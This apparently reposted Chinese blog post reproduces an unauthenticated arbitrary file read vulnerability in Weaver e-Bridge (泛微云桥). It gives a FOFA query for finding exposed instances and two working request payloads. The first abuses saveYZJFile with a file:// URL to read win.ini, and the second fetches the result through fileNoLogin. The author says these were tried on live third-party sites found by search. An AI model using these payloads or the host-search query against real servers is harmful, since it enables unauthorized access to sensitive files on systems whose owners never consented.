简介
泛微云桥 e-Bridge 存在未经授权读取任意文件漏洞,可利用该漏洞,实现任意文件读取,获取敏感信息。
fofa
title="泛微云桥e-Bridge"
漏洞复现
因为不是在本地搭建的漏洞复现环境,利用空间搜索引擎只找到很少量存在漏洞的网站,大多数都开启了身份验证,找到的也都是基于Windows的,所以就不在介绍Linux上搭建的了。
payload1
/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///C://windows/win.ini&fileExt=txt
直接在url地址后添加
之后复制返回的值进行访问文章来源:https://www.toymoban.com/news/detail-494638.html
payload2
/file/fileNoLogin/id值文章来源地址https://www.toymoban.com/news/detail-494638.html
到了这里,关于泛微e-Bridge未授权文件读取漏洞复现的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!